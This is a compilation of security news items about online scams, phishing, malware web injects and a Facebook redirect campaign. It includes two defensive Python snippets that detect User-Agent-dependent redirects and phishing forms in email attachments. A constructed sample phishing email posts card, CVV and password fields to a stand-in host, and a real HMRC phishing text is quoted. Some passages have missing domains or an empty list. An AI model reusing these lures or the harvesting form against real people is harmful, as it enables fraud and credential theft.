Russians began to click on scam sites 10 times more often

According to a Kaspersky Lab study, at the beginning of 2020 the number of attacks on Russians through scam resources increased 10 times to 15 million, and the number of such pages doubled to 10 thousand. The rapid increase is associated with the spread of the coronavirus. Fraudsters actively exploit the theme of the pandemic, from fake promises to pay benefits or refunds in exchange for a small cash contribution to the sale of personal protective equipment.

If every click on a scam page entailed the deception of at least one user, then the potential damage in the first quarter of 2020 could exceed 3 billion rubles ($40.5 million). Experts did not say how much money Russians lost on scam resources during this period.

Tatyana Sidorina, senior content analyst at Kaspersky Lab, believes that the popularity of scam resources has increased because Russians have begun to spend more time at home, on the Internet. In addition, users are offered various large compensation payments, for the withdrawal of which they need to pay a small commission.

She stressed that scam resources disguised as state lotteries began to be actively used at the beginning of 2020; 219 such resources were discovered. Kaspersky Lab noted that last year separate statistics on lotteries were not even kept.

To minimize the damage from fraud, the Stoloto state lottery is already actively cooperating with law enforcement agencies and conducting an information campaign, said Varvara Basanovich, the organization's operating director. She stressed that it is impossible to win the lottery without buying a ticket, and that the tax is paid after receiving the money, not in advance.

Andrey Arsentiev, head of Analytics and Special Projects at InfoWatch, expects that once the self-isolation regime ends, mass frauds involving tourist trips to Russian resorts may begin, and sellers of drugs for restoring strength, immunity and mental health may become active.

IT Firm’s Directors Arrested In A Rs 3,000 Crore E-Tendering Scam

Officials of Osmo IT Solutions were arrested by the economic offenses wing (EOW) on Thursday, just a day after an FIR was lodged in the Rs 3,000-crore e-tendering case.

The police have arrested the firm's directors Vinay Choudhary and Varun Chaturvedi, along with the marketing head Sunil Golwalkar, according to the EOW superintendent of police (Bhopal), Arun Mishra.

The case relates to how a few firms allegedly managed to hack the e-procurement portal to see the e-tenders before the bids were to be opened and then make favourable changes to their bids.

While the inquiry was under way at the offices of Osmo in Man Sarovar Complex, Bhopal, Mishra said that the computer emergency response team report had pointed to tampering with the e-tendering that had been done from the Osmo office.

“They are in our custody and we are questioning them. We have also seized hard disks and are analyzing the server data of the company,” he added.

EOW authorities said that in 2016, OSMO IT Solutions had been asked to carry out performance testing to find out why the e-procurement portal was working so slowly. For that purpose a "Demo department" was created in mid-2016 for training and practice for department officials and bidders.

Later, when the scam broke, an internal inquiry by the Madhya Pradesh state economic development corporation (MPSEDC), which facilitated the e-tendering portal, found that the user ID given to OSMO (PT_4) had been used more than once to access the e-procurement portal and change the 'tender document', and the CERT report confirmed that the changes had been made from the offices of OSMO.

“We are contacting all the departments and taking data from MPSEDC. So far we had been investigating only nine tenders from five departments, but since we are sure that a crime has been committed, it is logical that we expand the ambit of our investigations and include all e-tenders floated so far,” said the officials.

In the FIR lodged yesterday, cases were registered against five departments and eight companies, including OSMO IT Solutions.

Facebook's 'Dislike Button' scam

A few days after Facebook CEO Mark Zuckerberg announced in a Q&A session in September 2015 that the long-awaited Facebook ‘Dislike Button’ would be implemented soon, scammers seized upon the opportunity to spread phishing attacks and malware.

Soon after this, many users received a link inviting them to download Facebook’s ‘Dislike Button’, described as an "invite-only feature". One of the most popular dislike button scams is titled “Get newly introduced Facebook dislike button on your profile". Clicking on these links leads victims to malicious websites.

The ultimate goal of the scammers is to encourage users to share the link on their Facebook page. Once it has spread on Facebook, they ask for your personal information and account credentials, or sometimes the page downloads malicious software that causes further damage to the computer.

Zuckerberg, the co-founder and CEO, said, "We are working on it, and are very close to shipping a test of it."

Computer security expert Graham Cluley voiced concern about this on his blog: "Scams like this trick you into liking pages, and sharing the link with your friends, using the bait of something some cases they will even lead you to pricey premium rate mobile phone subscriptions, online surveys that generate the scammers income, or trick you into downloading malicious code onto your PC."

He advised, "Don't be duped. If you're a Facebook crack-addict then try to resist the urge of falling for the latest scam, and wait for Facebook to properly roll-out new features as and when they choose."

Beware of Sites Claiming to House “Gifts for My Subs”

A researcher at MalwareBytes revealed in a blog post that the online services like Steam, Amazon, iTunes, Skype, and Netflix provide opportunities to hack Facebook accounts and increase Instagram followers.

The researcher said that during their scam survey they picked any of the 10+ options offered results. Some of these choices direct users to a different domain, require more information (usually an email address), or ask the user to specify certain values as part of the ploy, such as how many diamonds they want added to their game or how many followers they want to gain.

“The amount of hoop-jumping these scammers want users to do is expected, but remember that the end result is the same: users don’t get what was promised to them. We also found other sites similar to searchcheat[DOT]com, which we implore you, dear Reader, to avoid visiting and sharing,” the researcher added.

They are as follows:

“It shouldn’t come as a surprise to video subscribers and fans, especially those numbering by the hundreds of thousands, to be targeted and nudged to click generally dodgy links. After all, scammers are also drawn to large crowds because that’s where the money is. That said, users must exercise utmost caution when dealing with links on comments and on profiles,” she said.

The researcher suggested that it is important for Internet personalities to communicate constantly with their followers about fishy links and other potentially harmful content posted publicly to their channels by shady characters. Taking their cue from JackSepticEye may be a good place to start.

British lady lost £50,000 in a “phishing scam”

Be careful with online transactions: a lady from London has claimed that she lost £50,000, her life savings, in a “phishing scam”.

According to a report published by the BBC, 59-year-old Vivian Gabb told the programme of Victoria Derbyshire, a British journalist and broadcaster, that she was in the middle of buying a house when her email was hacked by crooks.

She said that she was conned out of her life savings by scammers who sent her a 'phishing' email with instructions to wire the money to the “bank”.

She was unaware that every email she wrote and received was being monitored by criminals.

According to her, the criminals sent her a message disguised as a follow-up email from her solicitor and asked her to deposit nearly £50,000 into their account.

According to the news report, Get Safe Online, an internet safety advice website, says more than half (51%) of people in the UK have been a victim of an online crime, and 15% of people have been victims of either attempted or successful hacks of their email account.

Cyber criminals convicted of stealing more than £1 million using Fake job ads

An organized criminal network of five men and one woman has been convicted of stealing more than £1 million from job hunters using fake job advertisements.

The members of the criminal network are Adjibola Akinlabi (aged 26), Damilare Oduwole (26), Michael Awosile (27), Nadine Windley (26) and Temitope Araoye (29), and a malware writer, Tyrone Ellis (27).

The evidence gathered by the authorities, including phone and online chat records, shows that they made more than £300,000 from their fraud scheme. However, officers believe the figure could be much higher, possibly more than £1 million ($1.6m).

According to the National Crime Agency report, the fraudsters targeted innocent job hunters with fake job ads. Those who responded to the ads were sent a link via email asking them to complete an application form. Once the user clicks the link, malware is inadvertently installed on the victim's system.

The malware is capable of recording keystrokes and capturing the victim's financial and personal data.

The fraudsters used the compromised information to obtain new credit and debit cards and PIN numbers.

The crooks will remain in custody and are expected to be sentenced on Thursday 14 November.

Victim fell prey to 'phishing' scam and lost £1 Million to fraudsters

This is another incident that reveals why you should be careful on the Internet. A British woman fell prey to a phishing scam and lost her £1million life savings.

The victim unwittingly handed over her personal details to fraudsters after receiving a bogus bank notification email.

Tamer Abdelhamid, the fraudster who stole the personal data, then sold the information to a Nigerian national, Rilwan Oshodi. A 26-year-old woman from Sierra Leone used the data to change the bank details by pretending to be the victim.

During a raid on Oshodi's home, detectives seized his computer, which held details of more than 11,000 credit cards, according to a DailyMail report.

The fraudsters purchased cheeseburgers, high-end computers and gold with the stolen money. They are facing jail for their roles in the scam.

Beware spam emails seeking donations for victims of Hurricane Sandy disaster

While a lot of people are suffering severe damage from Superstorm Sandy, some groups are ready to take advantage of this natural disaster to push their crap.

Symantec has observed spam mails related to the hurricane flowing into its Probe Networks.

The spam mails, with the subjects 'Help Sandy Victims and get $1000 for Best Buy!', 'Sandy Strikes... [WARNING]' and 'Deposit Processing Open Today (Frankenstorm doesn't stop us)', exploit the disaster.

Taking advantage of natural disasters is nothing new for spammers. In the past, they have taken advantage of the Haiti earthquake and the Japanese earthquake and tsunami disaster.

Symantec researchers anticipate the following types of scams in the next few days: fake news, donation requests, 419 scams, phishing and malicious video link attacks.

We anticipate there will be Facebook video scam attacks and Twitter mention scams.

Symantec said internet users should reach out to storm victims through legitimate and secure channels, rather than donating money or buying products through wire transfer services or other untraceable methods of payment.

Facebook Clickjacking spam : "She is 17-years-old, she did it publicly in high school while drunk"

Facebook scams that use images of attractive girls doing various things are nothing new. Hoax-Slayer has come across another one that leads to a likejacking attack and lures users into completing surveys in order to watch videos.

"[STUNNING!!] She is 17-years-old, she did it publicly in high school while drunk, really stunning!" The title of the scam post reads.

When a user clicks the link, it opens a fake video webpage. If the user clicks the play button on the bogus video, it actually "likes" the scam post and displays it on their Facebook profile.

Then it opens another page where users are asked to complete a survey to verify their age before viewing the video.

Once victims complete the survey, they are asked to provide their mobile phone number, which is used to sign them up for paid SMS services.

Spam Tweets : "My aunt joined and is making 2k a week in less then 3 months."

If you are searching for an easy way to make money, beware of spam tweets that mention your name.

Today, in the 'Interactions' tab, I got a notification that one user had mentioned me in his tweet.

"My aunt joined @EasyMoney*** and is making 2k a week in less then 3 months. Can I join too? @BreakTheSec" the tweet reads. Oh, you want my suggestion?! You made a mistake by mentioning my name in the tweet.

In the Twitter account 'EasyMoney***', the tagline reads "Helping others generate online income for the past year. I offer 100% free training and can get you making $1,000 a week in just a month for FREE! [LINK] "

"Don't be fooled by some work at home system that costs money to start. 99% of those are scams. Try mine it is free no hidden fees at all" is one of the spam tweets that made me laugh. Oh, really?!
The link provided in his tweet redirects through multiple sites and finally lands me on the legitimate Flipkart site. @MalwareMustDie has confirmed that it is a spam clicker; it will make money for the spammers.

There are plenty of fake Twitter accounts posting the same tweet and mentioning a Twitter user name at the end of the tweet. I've pasted the list of fake Twitter accounts that are involved in this campaign.

I used a website called "twitwheel" to find out the reach of the scammer's Twitter account (I am using this site for the first time). A lot of users have responded to this tweet by asking "is this real , virus" and more. A few legitimate users also retweeted without realizing the truth.

At the time of writing, I have discovered another variant of this spam tweet.

Hi @QuickBuck** thanks to you im in my 47th day and have made over $6k. Can my friend join?

Fortunately, the main accounts of the spammer have been suspended by Twitter (thank you, Twitter).

* Update : *
The new variant of the spam tweet:

So @Paul38658587 can I still signup? My brother joined and is making great money @VictimAccount

Another interesting find:
Today, I analyzed the new variant of this spam campaign and discovered something interesting. The main spammer account retweets some posts from Twitter users.

I then analyzed those Twitter accounts as well. They have around 100 followers and have posted some legitimate-looking tweets. But if you compare the latest tweet with past tweets, you will find the truth. The similarity among those accounts is that their previous legitimate-looking tweets are from Jul 5 or 6.

Obviously, the followers of these fake accounts are also fake. I believe there will be thousands of accounts involved in this campaign.

Another interesting find is that the main spammer account always uses "Paul" as its name.

*Update 2* :
Im joining now @Paul32518314 because my cousin is a member and is making 4k a month in less then 2 months

Microsoft Cyber-Crime Department Phishing Scam

A spam mail purporting to be from the Microsoft Cyber-Crime Department claims that all email users around the world are required to validate their account by clicking a link in the message or risk having their email address deleted from the world email server.

“As part of the security measures to secure all email users across the world, All email users are mandated to have their account details registered as requested by the Microsoft Cyber-crime Dept ( M C D ),” part of the email reads.

“You are here by required to validate your account within 24 hours so as not to have your email account suspended and deleted from the world email server. Kindly validate your email account to have your account registered, follow d link below: [Link],” it continues.

To make it more legitimate-looking, the logo of Microsoft’s Digital Crime Unit has been embedded into the notification.

When users click on the link, they’re taken to a bogus website that’s designed to collect sensitive information and send it back to the attackers, Hoax Slayer reports.

Facebook virus: Citadel targets Facebook Users with Children’s Charity Scam

Security researchers from Trusteer have discovered a new variant of the Citadel malware that injects itself into your Facebook webpages and demands that you make a donation to a fake charity for sick children.

After users have logged into their Facebook account, the Citadel injection mechanism displays a pop-up that encourages the victim to donate $1 to children who “desperately” need humanitarian aid. Next, it asks you for your name, credit card number, expiration date, CVV, and security password.

What makes this attack particularly sophisticated is that the malware is configured to deliver the attack based on the user's country/language settings, with web-injection pages in five different languages: English, Italian, Spanish, German and Dutch.

In an interesting twist, the criminals do not reuse the same text for every language. Instead, they have customized each attack based on the victim’s country and/or region.

"This attack illustrates the continuing customization of financial malware and harvesting of credit card data from the global base of Facebook users. Using children’s charities as a scam makes this attack believable and effective," a Trusteer spokesperson wrote.

"Meanwhile, the one dollar donation amount is low enough that virtually anyone can contribute if they choose. This is a well-designed method for stealing credit and debit card data on a massive scale."

Fake Facebook photo tag notification leads to BlackHole Exploit page

Legitimate-looking emails that tell users they’ve been tagged in a picture on Facebook have been found to be part of a malicious campaign designed to spread a nasty Trojan. The emails were intercepted by Sophos Labs.

Apparently originating from (with three “o”s), the notifications tell the recipients that a member of the social media site has added a photo of them, Sophos experts report.

Once the user clicks the link provided in the email, they are taken to a website that hosts the BlackHole exploit kit.

To avoid raising any suspicion, within four seconds your browser is taken via a META redirect to the Facebook page of a presumably entirely innocent individual.

In the background, the BlackHole exploit kit takes advantage of vulnerabilities present on the user's system and drops a malware file onto the victim’s computer.

Bogus Facebook apps redirect you to a random Android app

Bogus Facebook apps redirect mobile traffic towards Android apps, warn Bitdefender security researchers. Cybercriminals developed fake versions of two legitimate apps, “Lista de Verificación del Amante Ideal” and “Lista de Verificare pentru Iubit(a)” (that’s Spanish and Romanian for “Girlfriend Checklist”). The fake versions promote Android games.

The legitimate versions of these apps are supposed to scan your Facebook contacts and list all the potential girlfriends/boyfriends among your friends. They also enable tagging so that “potential candidates” can be made aware of the app you’ve used.

These fake applications behave like their original counterparts in terms of functionality, but when they detect mobile traffic they perform an HTTP 302 redirect to another link that is not Facebook-related.

The fake version will redirect you to a random Google Play game if you are using an Android handset.

"None of the analyzed Google Play apps have proven to be infected with malware, but the possibility of being redirected to some potentially malicious application or website should not be taken lightly," says the researcher.

"This could be the beginning of paid promotions through Facebook, where Android app developers can actually subscribe to have their apps promoted via Facebook by means of illegitimate services. This type of paid advertisement of Android apps through Facebook is a new concept and although these redirecting links/apps are not malicious so far, they could turn out to be at some point."
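The User-Agent-dependent 302 described above can be checked for by requesting the same URL as a desktop and as an Android client without following redirects. The sketch below is an added example, not Bitdefender's tooling: the stub server, the User-Agent strings and the `store.example` target are constructed so that it runs offline.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Constructed User-Agent strings for the two probes.
DESKTOP_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0"
ANDROID_UA = "Mozilla/5.0 (Linux; Android 13; Pixel 7) Mobile Safari/537.36"
REDIRECT_CODES = {301, 302, 303, 307, 308}


class StubApp(BaseHTTPRequestHandler):
    """Local test fixture reproducing the reported behaviour: Android
    traffic gets a 302 to an off-site link, other clients get the page."""

    def do_GET(self):
        if "Android" in self.headers.get("User-Agent", ""):
            self.send_response(302)
            self.send_header("Location", "https://store.example/random-game")
            self.send_header("Content-Length", "0")
            self.end_headers()
        else:
            body = b"<html>checklist app</html>"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, fmt, *args):  # silence per-request logging
        pass


def probe(host, port, path, user_agent):
    """Fetch once without following redirects; return (status, Location)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers={"User-Agent": user_agent})
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def compare_user_agents(host, port, path="/"):
    """Report whether the response depends on the client's User-Agent."""
    desktop = probe(host, port, path, DESKTOP_UA)
    mobile = probe(host, port, path, ANDROID_UA)
    target = urlsplit(mobile[1] or "").hostname
    return {
        "desktop": desktop,
        "mobile": mobile,
        # Different status or different redirect target per User-Agent.
        "ua_dependent": desktop != mobile,
        # Mobile clients are sent to a host other than the one probed.
        "off_site": mobile[0] in REDIRECT_CODES and target not in (None, host),
    }


def run_demo():
    """Start the fixture on a free loopback port, probe it, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), StubApp)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return compare_user_agents("127.0.0.1", server.server_port)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Only the status code and `Location` header are compared, so ordinary per-request differences in page content do not trigger the check.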

P2P Zeus Variant targets Facebook, Google & Yahoo users

Trusteer researchers have discovered a peer-to-peer (P2P) variant of the Zeus platform that targets users of Google, Yahoo, Hotmail, Facebook in order to steal their credit card data.

The scams exploit the trust relationship between users and these well-known service providers, as well as the Visa and MasterCard brands.

When targeting Facebook users, the attackers use a web inject to present the victim with a fraudulent 20% cash back offer for linking their Visa or MasterCard debit card to their Facebook account. The scam claims that after registering their card information, the victim will earn cash back when they purchase Facebook points. The fake web form prompts the victim to enter their debit card number, expiration date, security code, and PIN.

In the attacks against Google Mail, Hotmail and Yahoo users, Zeus offers an allegedly new way of authenticating to the 3D Secure service offered by the Verified by Visa and MasterCard SecureCode programs.

The scam that targets Google Mail and Yahoo users claims that by linking their debit card to their web mail accounts all future 3D Secure authentication will be performed through Google Checkout and Yahoo Checkout respectively. The fraudsters allege that by participating in the program the victim’s debit card account will be protected from fraud in the future. The victim is prompted to enter their debit card number, expiration date, security code, and PIN.

The Hotmail scheme is somewhat similar: potential victims are informed that “Windows Live Inc” is concerned about their security and offers a “100% secure, fast and easy” method of preventing fraud by linking the account to the debit card.

This attack is a clever example of how fraudsters are using trusted brands – social network/email service providers and debit card providers – to get victims to put down their guard and surrender their debit card information.

These webinjects are well crafted both from a visual and content perspective, making it difficult to identify them as a fraud. It’s also ironic how in the Google Mail, Hotmail and Yahoo scams, the fraudsters are using the fear of the very cybercrime they are committing to prey on their victims.

"Draw Something" scam targets Twitter users

Sophos security researchers spotted a number of Twitter accounts that are spamming users, telling them that they have won a prize. After analyzing the accounts, the researchers found that they target Twitter users who have mentioned "Draw Something" in past tweets.

'Draw Something' is currently storming the online gaming scene with hundreds of millions of downloads onto iPhone and Android smartphones! In this game you're put into a room with other players and must then draw or doodle an image that will then be shown to another player who has to guess what it is that you've drawn!

The scam tweet claims it is offering 5000 prizes to lucky 'Draw Something' fans. "You have been chosen! Claim Your Prize[link]" reads one of the scam tweets. "You’re a lucky Prize Winner[link]" reads another variant.

Following the link will lead you to a newly-created website called The site says, "Congratulations Draw Something Fan. You’ve Been Randomly Selected! " and asks users to answer a few quick questions about 'Draw Something' in order to win a "FREE Gift worth over $500".

"What you will discover, however, is that you are taken to an all-too-familiar survey scam," the researcher said. "Your chances of ever receiving a prize are remote - chances are that you will either end up handing over personal information, or will be helping the original scammer earn commission".

Sophos has reported the accounts as spam to Twitter. This does not mean that the 'Draw Something' campaign has been destroyed; spammers always continue their spam attacks on innocent users.

New phishing scam targets Italy’s post office

A Bitdefender security researcher came across a phishing scam mail purporting to come from the Italian postal operator Poste Italiane. The spam mail targets the post office's clients and asks them to confirm their login data for maintenance reasons.

To trick users into believing that the mail comes from a legitimate source, the attacker added the legitimate menus and banners to the mail.
The fake mail asks recipients to confirm their identification data and provides a link that sends them to a login page asking for personal information such as user name, password, card ID or security card number.

Once the user submits the information, everything is stored in a plain text file on the same compromised server that hosts the phishing form. Because the data is stored in a text file, the information is available not only to the attackers but also to anyone who knows how to use a search engine to find valid CC info.

"As a rule always avoid giving out credit card information, especially when you need to disclose your PIN or CVV info. Banks and other institutions working with money never ask clients to change IDs or passwords via e-mail. When in doubt, pick up your phone and call or pay them a visit to make sure. Also, install anti-virus software and keep it up to date," the researcher advises.

"Get Free iPad 3 !" Beware of Facebook and Twitter Scams

While everyone is anticipating that Apple will announce a new version of its iPad tablet computer in San Francisco on March 7th, scammers have decided to take advantage.

A Sophos security researcher came across Facebook and Twitter scam posts that claim "Get free iPad 3". The interesting thing is that the iPad 3 doesn't exist yet.

"As Apple hasn't even announced the existence of an iPad 3, these posts and pages (some of which have existed for months) are clearly up to no good," says Researcher Graham Cluley.

"Chances are that we will see Apple announce an iPad 3 very soon. But don't be duped into believing there's an easy way to get one for free," he added.

McDonald’s Gift Card Spam on Twitter redirects to adult dating site

TrendMicro has spotted Twitter spam touting “gift cards” at the tail-end of the gift-giving season. These tweets have a shortened URL with the string "#mcdonalds gift card."

McDonald’s is a globally well-known fast food chain that, like many other establishments, does offer certificates and vouchers for patrons who would like to give these as gifts or rewards.

Unfortunately, this is not a gift card from McDonald’s; it is a Twitter scam that lands you on an adult dating site.

TrendMicro considers the URLs used in this attack malicious because of the deceitful way in which they are used. The lure “#mcdonald’s gift card” would definitely have led several users to believe that gift certificates or vouchers were being given away or discounted.

A couple of weeks ago in the US, attention was drawn to a Mystery Santa who donated $500 worth of gift cards from McDonald’s to a nearby homeless shelter. Whether or not cybercriminals got a social engineering idea from this cannot be confirmed, but in all cases users are advised against clicking on links without first inspecting them. In this case, hovering over the link would have given users a clue about how to proceed.

TAX Refund Notification: HMRC phishing scam

"New spam mails are currently circulating that purport to be sent by the UK tax organization HM Revenue & Customs (HMRC). These e-mails claim that the recipient is eligible to receive a tax refund and that he or she must download an attached file and open it in a browser," reports Sophos.

The scam e-mail:

Dear Taxpayer,
After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 223.56 GBP.

Please submit the tax refund request and allow us 6-9 days in order to process it.

To access your tax refund, please follow the steps below:

- download the Tax Refund Form attached to this email
- open it in a browser
- follow the instructions on your screen

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

If the victim opens the attachment, it asks them to enter their personal information. Of course, submitting the form won't actually send the information to HMRC; it will instead be sent to a malicious third party without the victim's knowledge or approval.
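A mail filter can catch this pattern by parsing HTML attachments and checking where their forms submit. The following is an added example, not Sophos's code: the sample message, the `.example` hosts, the field names and the field-name hints are constructed, and treating only `gov.uk` hosts as trusted is an assumption to adjust per deployment.

```python
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample message; all hosts are reserved .example names.
SAMPLE_EML = """\
From: "HM Revenue & Customs" <refunds@hmrc-refund.example>
To: taxpayer@mail.example
Subject: Tax Refund Notification
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Dear Taxpayer, download the Tax Refund Form attached to this email.

--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="Tax_Refund_Form.html"

<html><body>
<form method="post" action="http://collector.example/save.php">
<input type="text" name="fullname">
<input type="text" name="card_number">
<input type="password" name="cvv">
<input type="submit" value="Submit">
</form>
</body></html>
--b1--
"""

# Assumed substrings that mark a field as sensitive (heuristic).
SENSITIVE_HINTS = ("card", "cvv", "pin", "password", "account", "sort")


class FormCollector(HTMLParser):
    """Collect every <form> with its action and named <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open = {"action": attrs.get("action") or "", "fields": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None and attrs.get("name"):
            self._open["fields"].append((attrs["name"], attrs.get("type", "text")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def is_trusted(host, trusted_suffixes):
    """True if host equals a trusted domain or is a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in trusted_suffixes)


def triage_message(raw, trusted_suffixes=("gov.uk",)):
    """Return one finding per form found in an HTML attachment."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        # Only HTML parts that arrive as named files are of interest here.
        if part.get_content_type() != "text/html" or not part.get_filename():
            continue
        collector = FormCollector()
        collector.feed(part.get_content())
        for form in collector.forms:
            url = urlsplit(form["action"])
            host = url.hostname
            findings.append({
                "attachment": part.get_filename(),
                "post_host": host,
                "external": host is not None and not is_trusted(host, trusted_suffixes),
                "cleartext": url.scheme == "http",
                "sensitive_fields": [
                    name for name, kind in form["fields"]
                    if kind == "password" or any(h in name.lower() for h in SENSITIVE_HINTS)
                ],
            })
    return findings


if __name__ == "__main__":
    for finding in triage_message(SAMPLE_EML):
        print(finding)
```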